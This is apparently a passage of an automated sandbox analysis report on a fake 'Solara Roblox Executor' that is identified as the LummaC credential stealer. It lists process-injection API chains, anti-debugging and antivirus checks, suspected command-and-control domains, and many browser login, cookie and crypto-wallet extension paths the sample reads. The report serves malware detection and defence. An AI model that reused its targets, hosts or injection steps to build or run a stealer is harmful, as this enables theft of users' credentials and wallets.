Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 6_2_0043C6B0 LdrInitializeThunk,

6_2_0043C6B0

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 0_2_00301A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00301A60

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_0032019E mov edi, dword ptr fs:[00000030h]	0_2_0032019E
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_002F1BA0 mov edi, dword ptr fs:[00000030h]	0_2_002F1BA0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_002F1BA0 mov edi, dword ptr fs:[00000030h]	3_2_002F1BA0

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 0_2_00307020 GetProcessHeap,

0_2_00307020

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_002F9A67 SetUnhandledExceptionFilter,	0_2_002F9A67
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_00301A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00301A60
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_002F9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002F9A73
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_002F96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_002F96B3
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_002F9A67 SetUnhandledExceptionFilter,	3_2_002F9A67
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_00301A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00301A60
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_002F9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_002F9A73
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_002F96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_002F96B3

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 0_2_0032019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_0032019E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Memory written: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Solara-Roblox-Executor-v3.exe, 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	0_2_003068FD
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	0_2_0030B0C5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	0_2_0030B110
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0030B1B7
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0030AA37
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	0_2_0030B2BD
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	0_2_003063F5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	0_2_0030AC88
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0030AD30
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	0_2_0030AF83
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	0_2_0030AFF0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	3_2_003068FD
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	3_2_0030B0C5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	3_2_0030B110
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0030B1B7
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_0030AA37
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	3_2_0030B2BD
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	3_2_003063F5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	3_2_0030AC88
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_0030AD30
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: EnumSystemLocalesW,	3_2_0030AF83
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: GetLocaleInfoW,	3_2_0030AFF0

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 0_2_002FA335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_002FA335

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114533870.0000000005809000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145880192.0000000005809000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FAF000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140842466.000000000580A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093749347.0000000003016000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: lmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfo
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3,
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
